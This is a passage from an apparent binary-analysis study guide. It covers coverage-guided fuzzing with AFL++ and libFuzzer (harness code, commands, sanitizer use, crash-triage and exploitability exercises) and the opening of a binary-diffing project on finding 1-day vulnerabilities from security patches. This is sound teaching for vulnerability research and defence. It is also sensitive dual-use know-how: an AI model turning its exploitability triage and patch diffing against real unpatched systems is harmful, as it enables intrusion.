  • Alternative Programming Languages: Python (for orchestration)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Vulnerability Discovery / Fuzzing
  • Software or Tool: AFL++, libFuzzer, Address Sanitizer
  • Main Book: “The Fuzzing Book” (online)

What you’ll build: Fuzzing campaigns that automatically discover crashes and vulnerabilities in binary programs.

Why it teaches binary analysis: Fuzzing is how most modern vulnerabilities are found. Understanding fuzzing means understanding what makes programs crash.

Core challenges you’ll face:

  • Writing harnesses → maps to calling the target function
  • Preparing corpus → maps to good starting inputs
  • Triaging crashes → maps to which crashes are exploitable?
  • Binary-only fuzzing → maps to QEMU mode, Frida

Resources for key challenges:

Key Concepts:

  • Coverage-Guided Fuzzing: AFL++ docs
  • Sanitizers: LLVM sanitizer docs
  • Persistent Mode: AFL++ performance docs

Difficulty: Advanced. Time estimate: 2-3 weeks. Prerequisites: C programming, Projects 1-3.

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

# Compile target with instrumentation
$ afl-gcc -o target target.c

# Prepare input corpus
$ mkdir in out
$ echo "test" > in/seed1

# Start fuzzing
$ afl-fuzz -i in -o out ./target @@

AFL++ output:

american fuzzy lop ++4.00c

┌─ process timing ─────────────────────────────────────┐
│ run time      : 0 days, 0 hrs, 23 min, 45 sec        │
│ last new find : 0 days, 0 hrs, 0 min, 12 sec         │
├─ overall results ────────────────────────────────────┤
│ cycles done   : 847                                  │
│ corpus count  : 234                                  │
│ saved crashes : 3 (!)  ← Found bugs!                 │
│ saved hangs   : 0                                    │
└──────────────────────────────────────────────────────┘

# Triage crashes
$ for crash in out/crashes/*; do ./target "$crash" 2>&1 | head -5; done

Implementation Hints:

Writing a harness:
// For AFL++
int main(int argc, char **argv) {
    if (argc < 2) return 1;

    FILE *f = fopen(argv[1], "r");
    if (!f) return 1;

    char buf[1024];
    size_t len = fread(buf, 1, sizeof(buf), f);
    fclose(f);

    // Call the function we want to fuzz
    parse_input(buf, len);
    return 0;
}

// For libFuzzer
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    parse_input((char*)data, size);
    return 0;
}

AFL++ modes:

  • Source mode: Compile with afl-gcc/afl-clang-fast
  • QEMU mode: Fuzz binaries without source (-Q flag)
  • Frida mode: Alternative for binary-only
  • Persistent mode: Faster fuzzing with loop

Sanitizers (compile with these for better crash detection):

# Address Sanitizer (memory bugs)
clang -fsanitize=address,fuzzer target.c

# Undefined Behavior Sanitizer
clang -fsanitize=undefined,fuzzer target.c

Learning milestones:

  1. Fuzz simple target → Find obvious crashes
  2. Write custom harness → Fuzz specific functions
  3. Triage crashes → Determine exploitability
  4. Fuzz binary-only → No source code available

The Core Question You’re Answering

“How do we automatically generate millions of test inputs to stress-test software and uncover crashes, memory corruption, and security vulnerabilities—faster than any human could manually test?”

This project introduces coverage-guided fuzzing, a technique that uses code coverage feedback to intelligently generate inputs that explore new execution paths. You’ll learn how fuzzers like AFL++ combine random mutation with evolutionary algorithms to find bugs that have eluded traditional testing for years.

Concepts You Must Understand First

  1. Coverage-Guided Fuzzing vs. Dumb Fuzzing
    • Dumb fuzzing: random inputs, no feedback (fast but inefficient)
    • Coverage-guided: monitors code coverage, prioritizes inputs that reach new code
    • Evolutionary algorithm: “interesting” inputs mutated to find more code

    Guiding Questions:

    • Why does code coverage feedback make fuzzing 10-100x more effective?
    • What’s the difference between edge coverage and block coverage?
    • How does AFL++ track which inputs discovered new paths?

    Book References:

    • “The Fuzzing Book” (online) - Chapter: Coverage-Based Fuzzing
    • “Fuzzing: Brute Force Vulnerability Discovery” by Sutton, Greene, Amini - Chapter 4: Feedback-Driven Fuzzing
  2. Code Instrumentation and Compile-Time Hooking
    • How afl-gcc/afl-clang inject coverage tracking code into binaries
    • Shared memory bitmap: fast communication between target and fuzzer
    • Hash collisions and edge coverage vs. exact hit count

    Guiding Questions:

    • What assembly instructions does AFL++ insert at each basic block?
    • Why use shared memory instead of file I/O for coverage feedback?
    • What happens when two different edges hash to the same bitmap index?

    Book References:

    • AFL++ Technical Whitepaper
    • “Practical Binary Analysis” by Dennis Andriesse - Chapter 11: Dynamic Binary Instrumentation (similar techniques)
  3. Genetic Algorithms in Fuzzing
    • Mutation strategies: bit flips, byte replacements, arithmetic operations
    • Crossover/splicing: combining parts of two interesting inputs
    • Fitness function: how “interesting” is this input? (new coverage? speed?)

    Guiding Questions:

    • Why does AFL++ keep a queue of “interesting” inputs instead of just one?
    • How does deterministic mutation differ from havoc mutation?
    • What makes an input worth saving to the corpus?

    Book References:

    • “The Fuzzing Book” - Chapter: Mutation-Based Fuzzing
    • “The Fuzzing Book” - Chapter: Grammar-Based Fuzzing (advanced: structured inputs)
  4. Sanitizers (ASan, UBSan, MSan)
    • AddressSanitizer (ASan): detects buffer overflows, use-after-free
    • UndefinedBehaviorSanitizer (UBSan): catches signed integer overflow, null deref
    • MemorySanitizer (MSan): finds uninitialized memory reads

    Guiding Questions:

    • Why doesn’t a buffer overflow always cause an immediate crash?
    • How does ASan detect a 1-byte overflow that doesn’t corrupt anything critical?
    • What’s the performance cost of running with sanitizers?

    Book References:

    • LLVM Sanitizer Documentation
    • “The Fuzzing Book” - Chapter: Fuzzing with Grammars (discusses sanitizers)
    • Google AddressSanitizer Wiki
  5. Harness Design
    • Isolating the target function from I/O, state, and external dependencies
    • Persistent mode: fuzz in-process loop (1000x faster than fork-exec)
    • Shared memory fuzzing: even faster communication

    Guiding Questions:

    • Why is fork-exec fuzzing slower than persistent mode?
    • What state needs to be reset between iterations in persistent mode?
    • When would you NOT use persistent mode?

    Book References:

    • AFL++ Documentation - Persistent Mode
    • “The Fuzzing Book” - Chapter: Fuzzing APIs
  6. Corpus Distillation and Minimization
    • Corpus: collection of “interesting” inputs that trigger unique paths
    • Minimization: reducing input size while preserving path coverage
    • Why smaller inputs = faster fuzzing

    Guiding Questions:

    • Why does AFL++ automatically minimize crash inputs?
    • How can you merge multiple fuzzer output directories?
    • What’s the trade-off between corpus size and fuzzing speed?

    Book References:

    • AFL++ Documentation - Corpus Management
    • “The Fuzzing Book” - Chapter: Reducing Failure-Inducing Inputs
  7. Binary-Only Fuzzing (QEMU Mode)
    • When source code isn’t available (proprietary software, firmware)
    • QEMU user-mode emulation: CPU-level instrumentation
    • Performance cost: 2-5x slower than source-based fuzzing

    Guiding Questions:

    • How does AFL++ instrument a binary without recompiling?
    • Why is QEMU mode slower than compile-time instrumentation?
    • When would you use Frida mode instead of QEMU mode?

    Book References:

    • AFL++ Documentation - Binary-Only Fuzzing
    • QEMU User Mode Documentation
  8. Crash Triage and Exploitability
    • Not all crashes are exploitable (assertion failures, null deref in safe context)
    • Stack traces, registers, and memory dumps to understand root cause
    • Exploitability scoring: can an attacker control RIP/EIP?

    Guiding Questions:

    • What’s the difference between a DoS crash and RCE crash?
    • How do you deduplicate crashes (same bug, different inputs)?
    • What makes a heap overflow more exploitable than a stack overflow?

    Book References:

    • “The Fuzzing Book” - Chapter: Debugging and Fixing Bugs
    • “Practical Malware Analysis” by Sikorski & Honig - Chapter 7: Analyzing Malicious Windows Programs (crash analysis)
    • “Hacking: The Art of Exploitation” by Jon Erickson - Chapter 0x300: Exploitation (exploitability)
  9. Fuzzing State Machines and Protocols
    • Stateful fuzzing: multiple requests in sequence (login → action → logout)
    • Protocol fuzzing: maintaining valid structure while mutating fields
    • Grammar-based fuzzing for structured inputs (JSON, XML, network protocols)

    Guiding Questions:

    • How do you fuzz a server that requires authentication?
    • Why is completely random data ineffective for JSON parsing?
    • How do you maintain protocol structure while still finding bugs?

    Book References:

    • “The Fuzzing Book” - Chapter: Fuzzing APIs
    • “The Fuzzing Book” - Chapter: Grammars and Parse Trees
    • “Fuzzing: Brute Force Vulnerability Discovery” - Chapter 11: Protocol Fuzzing
  10. Parallelization and Distributed Fuzzing
    • Running multiple fuzzer instances for better coverage
    • Main/secondary architecture (AFL++ -M/-S): instances share discoveries
    • Syncing corpus between fuzzers

    Guiding Questions:

    • Why can 10 cooperating fuzzer instances find more paths than 10 isolated ones?
    • How do AFL++ instances communicate discovered paths?
    • What’s the optimal number of fuzzer instances for your CPU cores?

    Book References:

    • AFL++ Documentation - Parallelization
    • “The Fuzzing Book” - Chapter: Fuzzing with Grammars (scaling)
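The core feedback loop from concepts 1–3 fits in a few dozen lines. This stdlib-only toy (not AFL++) models the shared-memory bitmap as a set of (prev_block, cur_block) edges and keeps a mutated input only if it lights up an edge not seen before; the target and every constant here are invented for illustration.

```python
# Toy coverage-guided fuzzing loop: edge coverage decides which mutated
# inputs join the corpus, the way AFL++'s bitmap does.

import random

def run_target(data):
    """Return the set of edges the toy parser executes for this input."""
    edges, prev = set(), 0
    def hit(block):
        nonlocal prev
        edges.add((prev, block))
        prev = block
    hit(1)                                    # entry block
    if len(data) > 0 and data[0] == ord("A"):
        hit(2)
        if len(data) > 1 and data[1] == ord("B"):
            hit(3)                            # deepest block: the "bug"
    hit(4)                                    # exit block
    return edges

def fuzz(seed=b"XX", rounds=5000):
    random.seed(0)                            # deterministic demo run
    corpus, seen = [seed], set(run_target(seed))
    for _ in range(rounds):
        data = bytearray(random.choice(corpus))
        data[random.randrange(len(data))] = random.randrange(256)
        edges = run_target(bytes(data))
        if not edges <= seen:                 # new edge -> interesting input
            seen |= edges
            corpus.append(bytes(data))
    return corpus, seen

corpus, seen = fuzz()
print(len(corpus), (2, 3) in seen)            # did we ever reach block 3?
```

Note that an input reaching only "A" already contributes the new edge (1, 2), so partial progress is rewarded — this is why coverage feedback beats dumb fuzzing on nested conditions. Real AFL++ uses a fixed-size shared-memory bitmap with hashed edge indices rather than an exact set, which is why the hash collisions from concept 2 matter.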

Questions to Guide Your Design

  1. How do you design a good seed corpus for your target?
    • Should seeds be minimal? Diverse? Cover all features?
    • Where do you get seeds? (valid test files, documentation examples, web scraping)
    • How many seeds is optimal? (1? 100? 10,000?)
  2. What’s your strategy for persistent mode harness design?
    • What state needs reset (globals, heap, file descriptors)?
    • How do you handle memory leaks in persistent mode?
    • When does cumulative state pollution become a problem?
  3. How do you prioritize which crashes to investigate first?
    • Stack smashing vs. heap corruption vs. null deref
    • Unique crash traces vs. duplicates
    • Consider: exploitability, severity, ease of fix
  4. When should you use AFL++ vs. libFuzzer?
    • AFL++: standalone binaries, fork-exec model, binary-only support
    • libFuzzer: in-process fuzzing, better for libraries/APIs, faster
    • Which for: file parser? Network server? Library function?
  5. How do you fuzz a program that requires specific input structure?
    • Use AFL++’s custom mutators? Grammar-based fuzzer?
    • Pre-process inputs to fix checksums/lengths?
    • Or just let fuzzer learn structure through feedback?
  6. What metrics tell you fuzzing is “done” or needs a different approach?
    • No new paths in N hours?
    • Diminishing returns on exec/sec?
    • Coverage plateau?
  7. How would you fuzz a network server with AFL++?
    • Harness that reads from file and sends to socket?
    • Preeny/AFL++’s network mode?
    • Consider: connection handling, state, timeouts
  8. What’s your approach for triaging hundreds of crash files?
    • Automated deduplication (stack hash, crash hash)
    • Minimization to reduce noise
    • Scripted triage: GDB automation, register dumps
    • Prioritization based on exploitability signals
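As a sketch of the scripted-triage idea in question 8: hashing the top few backtrace frames groups crashes by root cause even when the triggering inputs differ. The input format (a list of frame strings per crash) and all crash names below are hypothetical.

```python
# Stack-hash deduplication: crashes with the same top-of-stack frames are
# almost certainly the same bug, so bucket them under one signature.

import hashlib

def stack_hash(frames, depth=3):
    """Hash the top N frames so one root cause maps to one signature."""
    top = "|".join(frames[:depth])
    return hashlib.sha1(top.encode()).hexdigest()[:12]

crashes = {
    "crash-001": ["parse_header+0x13", "parse+0x40", "main+0x22"],
    "crash-002": ["parse_header+0x13", "parse+0x40", "main+0x22"],
    "crash-003": ["memcpy+0x7", "copy_pixels+0x91", "parse+0x5a"],
}

buckets = {}
for name, frames in crashes.items():
    buckets.setdefault(stack_hash(frames), []).append(name)

print(len(buckets))   # unique crash signatures, not raw crash files
```

In practice you would extract the frames by scripting GDB (batch mode with `bt`) over each file in out/crashes/, then investigate one representative per bucket.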

Thinking Exercise

Exercise 1: Understanding Coverage Feedback

Consider this simple function:

void parse(char *input) {
    if (input[0] == 'A') {
        if (input[1] == 'B') {
            if (input[2] == 'C') {
                crash();  // Bug!
            }
        }
    }
}

Questions:

  1. Starting with seed “XXX”, what mutations will AFL++ try?
  2. How many generations to reach “ABC” (on average)?
  3. Why would dumb fuzzing (pure random) take millions of tries?
  4. Draw the coverage map evolution as AFL++ discovers A, AB, ABC.
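For question 3, the arithmetic is quick: a dumb fuzzer drawing three random bytes must match 'A', 'B', and 'C' simultaneously.

```python
# Expected number of attempts for pure random fuzzing to hit "ABC".

p = (1 / 256) ** 3      # probability one random try matches all three bytes
print(round(1 / p))     # 16777216 expected attempts (256**3)
```

Coverage feedback turns this product of probabilities into a sum: roughly 256 tries to find 'A', then 256 more for 'B', then 256 for 'C' — hundreds of attempts instead of millions.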

Exercise 2: Designing a Harness

You need to fuzz this library function:

int process_image(uint8_t *data, size_t len) {
    // Parses image header, processes pixels
    // Maintains internal state in global variables
    return 0;
}

Tasks:

  1. Write an AFL++ harness (file-based).
  2. Convert to persistent mode harness.
  3. What global state needs resetting?
  4. How do you handle if process_image crashes?

Exercise 3: Crash Triage

AFL++ found a crash with this input: AAAAAAAAAAAAAAAAAAAAAAAAAAAA... (100 A’s)

GDB shows:

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()

Questions:

  1. What type of vulnerability is this?
  2. Is it likely exploitable? Why?
  3. What register likely contains 0x4141414141414141?
  4. How would you confirm this is a buffer overflow vs. use-after-free?
  5. What’s the next step: minimize input, write exploit, or file bug report?

Exercise 4: Optimizing Fuzzing Performance

Your fuzzer shows these stats:

exec speed: 150/sec
corpus count: 4500
last new path: 6 hours ago
stability: 95%

Questions:

  1. Is 150 exec/sec good or bad? (Depends on target complexity)
  2. What does stability below 100% (here 95%) indicate?
  3. What would you try to increase exec/sec?
  4. When should you stop fuzzing this campaign?

Exercise 5: Sanitizer Output Analysis

ASan reports:

==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000018
READ of size 4 at 0x602000000018
    #0 0x4005a3 in parse_header /src/parser.c:45
    #1 0x4006f2 in main /src/main.c:12

0x602000000018 is located 0 bytes to the right of 24-byte region
allocated by:
    #0 0x7f8b2e in malloc
    #1 0x4005f3 in parse_header /src/parser.c:42

Interpret this:

  1. What line contains the bug?
  2. What was the allocation size?
  3. How many bytes did the read overflow by?
  4. Is this a write or read overflow? (Check severity)
  5. What fix would you apply?

The Interview Questions They’ll Ask

  1. “Explain how AFL++’s coverage-guided fuzzing works.”
    • Expected Answer: AFL++ instruments the binary to track which edges (basic block transitions) are hit. It maintains a bitmap of discovered edges. For each input, it checks if new edges are hit. If yes, the input is “interesting” and saved to corpus for mutation. AFL++ mutates interesting inputs (bit flips, arithmetic, splicing) and repeats. Over time, it evolves inputs that explore deeper into the program, finding crashes in rare paths.
  2. “What’s the difference between afl-gcc, afl-clang-fast, and afl-qemu?”
    • Expected Answer: afl-gcc: compile-time instrumentation via GCC plugin, slower compilation. afl-clang-fast: uses LLVM passes for instrumentation, faster and better optimization. afl-qemu: binary-only fuzzing via CPU emulation, no source needed but 2-5x slower. Use clang-fast when you have source, QEMU when you don’t.
  3. “Why is persistent mode faster than fork-exec mode?”
    • Expected Answer: Fork-exec mode spawns a new process for every input (high overhead: process creation, loading binary, linking libraries). Persistent mode runs target in a loop within same process—just one fork, then thousands of iterations. Can achieve 1000x speedup. Trade-off: must ensure state is reset between iterations to avoid cumulative bugs.
  4. “What’s AddressSanitizer and why use it with AFL++?”
    • Expected Answer: ASan is a compiler instrumentation that detects memory errors (buffer overflows, use-after-free, double-free). It adds “red zones” around allocations and checks every memory access. With AFL++, ASan catches subtle bugs that don’t immediately crash—turning silent corruption into loud crashes. Performance cost: 2x slowdown, but worth it for bug detection.
  5. “You’ve been fuzzing for 24 hours with no new paths. What do you do?”
    • Expected Answer: (1) Check coverage—have you plateaued at low coverage? (2) Improve seed corpus—add diverse valid inputs. (3) Try custom mutator for structured data. (4) Use dictionary for magic bytes/keywords. (5) Try grammar-based fuzzing for complex formats. (6) Check if target is doing input validation that rejects most mutations. (7) Consider if you’ve found all easy bugs—might need symbolic execution or manual analysis for deeper bugs.
  6. “How do you triage 500 crash files from a fuzzing campaign?”
    • Expected Answer: (1) Deduplicate: Use AFL++’s afl-cmin or crash hash (stack trace hash) to group duplicates. (2) Minimize: Use afl-tmin to reduce crash inputs to minimal size. (3) Exploitability: Prioritize based on crash type (RIP control > heap overflow > null deref). (4) Automate: Script GDB to dump registers/backtrace for each unique crash. (5) Categorize: File bugs by root cause. (6) Fix: Start with most severe/exploitable.
  7. “What’s the difference between edge coverage and block coverage?”
    • Expected Answer: Block coverage: which basic blocks executed (e.g., blocks A, B, C). Edge coverage: which transitions between blocks (A→B, B→C). Edge coverage is more precise—same blocks can be hit via different paths. Example: if(x) {A();} else {B();} C(); has edges (start→A→C) and (start→B→C). AFL++ uses edge coverage to discover these different paths.
  8. “How would you fuzz a closed-source binary?”
    • Expected Answer: Use AFL++’s QEMU mode (-Q flag) or Frida mode. QEMU emulates the binary and instruments at CPU instruction level. Slower than source-based but works without source. Steps: (1) afl-fuzz -Q -i in -o out ./binary @@. (2) May need -m none to lift the memory limit, since emulated targets use more memory. (3) May need to adjust timeouts for slower execution. (4) Alternative: use Intel PT for hardware-based tracing (faster than QEMU).
  9. “Explain the concept of a ‘deterministic’ vs. ‘havoc’ stage in AFL++.”
    • Expected Answer: Deterministic: AFL++ tries systematic mutations—every bit flip, byte flip, arithmetic operations at every position. Thorough but slow. Havoc: random chaotic mutations—multiple random changes per input, stacked mutations, splicing. Fast exploration. AFL++ does deterministic first for new inputs, then switches to havoc. Deterministic finds “obvious” bugs, havoc finds complex multi-condition bugs.
  10. “You found a crash but the minimized input is still 10KB. Why might minimization fail to shrink it further?”
    • Expected Answer: (1) Bug requires multiple conditions spread across input. (2) Checksum/length field must match—removing bytes breaks validity. (3) Complex state machine—need valid sequence to reach crash. (4) Minimizer’s algorithm limitation (greedy approach can get stuck). Solutions: (1) Manual analysis to understand trigger. (2) Use structure-aware minimization. (3) Binary search on input chunks. (4) Check if crash is stable—does it reproduce consistently?
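Question 7’s block-vs-edge distinction is easy to demonstrate directly. A minimal sketch in Python (the block labels and traces are invented for illustration):

```python
# Toy comparison of block coverage vs. edge coverage.
# A "trace" is the ordered list of basic blocks one execution visited.

def block_coverage(traces):
    """Set of basic blocks hit by any trace."""
    return {block for trace in traces for block in trace}

def edge_coverage(traces):
    """Set of (src, dst) transitions hit by any trace."""
    return {edge for trace in traces for edge in zip(trace, trace[1:])}

# if (x) { A(); } C();
run1 = ["start", "A", "C"]   # condition true: start -> A -> C
run2 = ["start", "C"]        # condition false: start -> C directly

# run2 visits no new blocks, so block coverage cannot tell it apart
# from run1 - but it exercises a new edge (start -> C), which is why
# an edge-coverage fuzzer like AFL++ keeps it as an interesting input.
print(block_coverage([run1, run2]) == block_coverage([run1]))   # True
print(sorted(edge_coverage([run1, run2]) - edge_coverage([run1])))  # [('start', 'C')]
```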

Books That Will Help

| Topic | Book | Chapter/Section | Why It Matters |
|-------|------|-----------------|----------------|
| Fuzzing Fundamentals | “The Fuzzing Book” by Andreas Zeller et al. (online) | Chapter: Coverage-Based Fuzzing | Comprehensive introduction to fuzzing concepts |
| Mutation Strategies | “The Fuzzing Book” | Chapter: Mutation-Based Fuzzing | How fuzzers generate new inputs |
| Grammar-Based Fuzzing | “The Fuzzing Book” | Chapter: Fuzzing with Grammars | Structured input fuzzing (JSON, XML) |
| Reducing Inputs | “The Fuzzing Book” | Chapter: Reducing Failure-Inducing Inputs | Input minimization techniques |
| Professional Fuzzing | “Fuzzing: Brute Force Vulnerability Discovery” by Sutton, Greene, Amini | Ch. 4: Feedback-Driven Fuzzing | Industry perspective on fuzzing |
| Protocol Fuzzing | “Fuzzing: Brute Force Vulnerability Discovery” | Ch. 11: Network Protocol Fuzzing | Fuzzing stateful systems |
| Binary Instrumentation | “Practical Binary Analysis” by Dennis Andriesse | Ch. 11: Dynamic Binary Instrumentation | How instrumentation works (Pin, DynamoRIO, similar to AFL++) |
| Memory Corruption | “Hacking: The Art of Exploitation” by Jon Erickson | Ch. 0x300: Exploitation | Understanding crashes fuzzers find |
| Buffer Overflows | “Hacking: The Art of Exploitation” | Ch. 0x350: Buffer Overflows | What makes crashes exploitable |
| Shellcode and Payloads | “Hacking: The Art of Exploitation” | Ch. 0x500: Shellcode | Exploitation after finding crash |
| Heap Exploitation | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch. 9.9: Dynamic Memory Allocation | Understanding heap bugs fuzzers find |
| Memory Safety | “Computer Systems: A Programmer’s Perspective” | Ch. 9.11: Common Memory-Related Bugs | Types of vulnerabilities fuzzing discovers |
| Program Optimization | “Computer Systems: A Programmer’s Perspective” | Ch. 5: Optimizing Program Performance | Understanding fuzzer performance |
| Crash Analysis | “Practical Malware Analysis” by Sikorski & Honig | Ch. 9: OllyDbg (debugging crashes) | Triaging fuzzer-discovered crashes |
| GDB for Triage | “The Art of Debugging with GDB, DDD, and Eclipse” by Matloff & Salzman | Entire book | Automating crash analysis |
| Sanitizers | Google AddressSanitizer Documentation | All sections | Using ASan/MSan/UBSan with fuzzers |
| LLVM Sanitizers | LLVM Sanitizer Documentation | All sections | Understanding sanitizer output |
| AFL++ Technical Details | AFL++ Official Documentation | All sections | Comprehensive AFL++ usage guide |
| Parallel Fuzzing | AFL++ Documentation | Parallelization section | Scaling fuzzing campaigns |
| QEMU Internals | QEMU User Mode Documentation | Technical documentation | Understanding binary-only fuzzing |
| libFuzzer | libFuzzer Tutorial by Google | Full tutorial | Alternative in-process fuzzing |

Project 13: Binary Diffing

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Ghidra scripts
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Patch Analysis / Vulnerability Research
  • Software or Tool: BinDiff, Diaphora, Ghidriff
  • Main Book: N/A (tool documentation)

What you’ll build: Compare two versions of a binary to find what changed, useful for understanding patches and finding 1-day vulnerabilities.

Why it teaches binary analysis: Comparing old and new versions reveals exactly what was fixed, helping you understand vulnerabilities.

Core challenges you’ll face:

  • Function matching → maps to identifying same function across versions
  • Diffing algorithms → maps to graph-based comparison
  • Finding security patches → maps to what was the vulnerability?
  • Interpreting results → maps to understanding the change

Resources for key challenges:

Key Concepts:

  • Function Matching: BinDiff documentation
  • Graph Isomorphism: Comparison algorithms
  • Patch Tuesday Analysis: Security research blogs

Difficulty: Intermediate
Time estimate: 1-2 weeks
Prerequisites: Project 5 (Ghidra)

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

Using ghidriff:

```bash
$ ghidriff libpng-1.6.39.so libpng-1.6.40.so -o diff_report
```

Output:

```
Modified Functions:
  png_read_IDAT_data (similarity: 0.87)
    - Added bounds check at 0x1234
    - New comparison: if (length > max_size)
  png_handle_chunk (similarity: 0.95)
    - Additional validation in switch statement

New Functions:
  png_check_chunk_length

Deleted Functions:
  (none)

Analysis:
  The patch adds a bounds check in png_read_IDAT_data.
  This fixes CVE-2023-XXXX (buffer overflow).
  Vulnerable code: memcpy without size check.
  Fixed code: size validated before copy.
```

**Implementation Hints**:

Binary diffing workflow:
1. Get old and new versions of binary
2. Export to BinDiff/Diaphora format
3. Run the diffing tool
4. Focus on:
   - Modified functions with low similarity
   - New validation/bounds check functions
   - Changes near memory operations

Tools:
- **BinDiff**: Best for IDA Pro users
- **Diaphora**: Open source, works with IDA
- **Ghidriff**: Works with Ghidra, command-line
- **Ghidra Version Tracking**: Built-in

Identifying security patches:
- Look for new `if` statements (validation)
- Look for changes to buffer operations
- Look for new error handling
- Check functions near strings like "overflow", "bounds"
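The “modified functions with low similarity” heuristic can be prototyped without any diffing framework. A minimal sketch, assuming you have already extracted each function's mnemonic sequence (the example mnemonics and the function they represent are invented):

```python
def trigrams(mnemonics):
    """N-grams over instruction mnemonics; operands (and thus
    addresses) are ignored, so relocation alone doesn't hurt the score."""
    return {tuple(mnemonics[i:i + 3]) for i in range(len(mnemonics) - 2)}

def similarity(old, new):
    """Jaccard similarity of mnemonic trigram sets (1.0 = identical shape)."""
    a, b = trigrams(old), trigrams(new)
    return len(a & b) / len(a | b) if a | b else 1.0

# Hypothetical function before and after a bounds-check patch
# (the patch inserts a cmp/ja pair before the copy):
v1 = ["push", "mov", "mov", "call", "mov", "ret"]
v2 = ["push", "mov", "cmp", "ja", "mov", "call", "mov", "ret"]

print(similarity(v1, v1))  # 1.0  - unchanged functions match exactly
print(similarity(v1, v2))  # 0.25 - patched function drops sharply
```

Functions scoring well below 1.0 against their best match are exactly the “focus on modifications” candidates from the workflow above.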

**Learning milestones**:
1. **Diff two versions** → Generate comparison report
2. **Identify changed functions** → Focus on modifications
3. **Find security patches** → Understand what was fixed
4. **Recreate vulnerability** → Test on old version

### The Core Question You're Answering

**"How do you identify what changed between two versions of a binary when you only have compiled code, and why is this the first step in finding 1-day vulnerabilities?"**

This project explores patch analysis: when a vendor releases a security update, the binary changes but source code is rarely available. You must reverse-engineer both versions, identify differences, understand what was fixed, and potentially discover the vulnerability before attackers do.

### Concepts You Must Understand First

1. **Control Flow Graph (CFG) Isomorphism**
   - A CFG represents a function's execution paths as a directed graph where nodes are basic blocks and edges are jumps/branches
   - Graph isomorphism algorithms determine if two CFGs are structurally identical even if addresses differ

   *Guiding Questions:*
   - How does compiler optimization affect CFG structure without changing functionality?
   - Why can't you simply compare binaries byte-by-byte?
   - What makes two functions "similar" when their assembly differs but behavior is identical?

   *Book References:*
   - "Practical Binary Analysis" by Dennis Andriesse - Ch 6: Disassembly and Binary Analysis
   - "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron - Ch 3.6: Control Flow

2. **Basic Block Hashing and Function Fingerprinting**
   - Basic blocks are instruction sequences with single entry/exit points
   - Hashing creates unique fingerprints based on instruction semantics

   *Guiding Questions:*
   - How do you create a hash resilient to address changes but sensitive to instruction changes?
   - What happens to basic block boundaries when a single instruction is added?

   *Book References:*
   - "Practical Binary Analysis" by Dennis Andriesse - Ch 5: Binary Analysis Fundamentals

3. **Structural vs. Semantic Diffing**
   - Structural diffing compares code organization (CFG structure, basic block count)
   - Semantic diffing analyzes what code actually does

   *Guiding Questions:*
   - How can functions be structurally different but semantically identical?
   - What security patches show up in structural diff but not semantic diff?

   *Book References:*
   - "Practical Binary Analysis" by Dennis Andriesse - Ch 6: Advanced Binary Analysis

4. **Call Graph Analysis**
   - Call graphs map relationships between functions
   - Changes in call patterns often indicate security-relevant modifications

   *Guiding Questions:*
   - How does a new security check manifest in the call graph?
   - Why are changes to error-handling call paths interesting for security?

   *Book References:*
   - "Practical Binary Analysis" by Dennis Andriesse - Ch 7: Advanced Static Analysis

5. **Patch Analysis Workflow**
   - Systematic process: acquire binaries → analyze → diff → triage → focus on security changes

   *Guiding Questions:*
   - What function changes most likely indicate security fixes?
   - How do you differentiate critical security patches from benign bug fixes?

   *Book References:*
   - "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x300: Exploitation
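One answer to concept 2's “hash resilient to address changes” question is to normalize operands before hashing. A sketch, assuming instructions arrive as (mnemonic, operand-string) tuples—in practice they would come from Capstone or a Ghidra script:

```python
import hashlib
import re

def normalize(operands):
    """Replace immediates and addresses with a placeholder so that
    loading the binary at a different base yields the same hash."""
    return re.sub(r"0x[0-9a-fA-F]+|\b\d+\b", "IMM", operands)

def block_hash(instructions):
    """Hash of (mnemonic, normalized operands) for one basic block."""
    canon = ";".join(f"{m} {normalize(ops)}" for m, ops in instructions)
    return hashlib.sha256(canon.encode()).hexdigest()[:16]

# The same block, seen at two different load addresses:
at_base1 = [("mov", "eax, [rbp-0x14]"), ("call", "0x401030")]
at_base2 = [("mov", "eax, [rbp-0x14]"), ("call", "0x7f3001030")]
print(block_hash(at_base1) == block_hash(at_base2))  # True

# Adding a single instruction (e.g. a new bounds check) changes the hash:
patched = at_base1 + [("cmp", "eax, 0x539")]
print(block_hash(at_base1) == block_hash(patched))   # False
```

This is deliberately crude—it also erases meaningful constants—but it shows the trade-off every fingerprint scheme makes between resilience and sensitivity.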

### Questions to Guide Your Design

1. **What matching algorithm first?** Simple heuristics (function size, strings) or CFG isomorphism?

2. **How will you handle false positives?** What secondary checks confirm matches?

3. **Strategy for unmatched functions?** How do you analyze functions in only one version?

4. **How do you visualize results?** Command-line, side-by-side disassembly, HTML reports?

5. **What metadata to extract?** Beyond CFGs, what information helps disambiguate functions?

6. **Handling different compiler optimizations?** How do you compare -O0 vs -O2 binaries?

7. **Triaging strategy?** How do you prioritize which differences to investigate?

8. **Validating findings?** How do you prove a vulnerability is exploitable?

### Thinking Exercise

**Manual binary diffing exercise:**

Compile two versions: Version 1 with `strcpy(buffer, input)` and Version 2 with bounds checking. Then:
- Disassemble both in Ghidra/IDA/radare2
- Draw CFGs for both versions
- Identify exact assembly differences
- Document: V1 has single basic block, V2 has diamond pattern with conditional
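For the “identify exact assembly differences” step, Python's difflib is enough once you have the two listings; the instruction sequences below are hypothetical disassembly for the two versions:

```python
import difflib

# Hypothetical disassembly of the copy routine in each version:
v1 = [
    "mov rsi, [rbp-0x10]",
    "mov rdi, [rbp-0x8]",
    "call strcpy",
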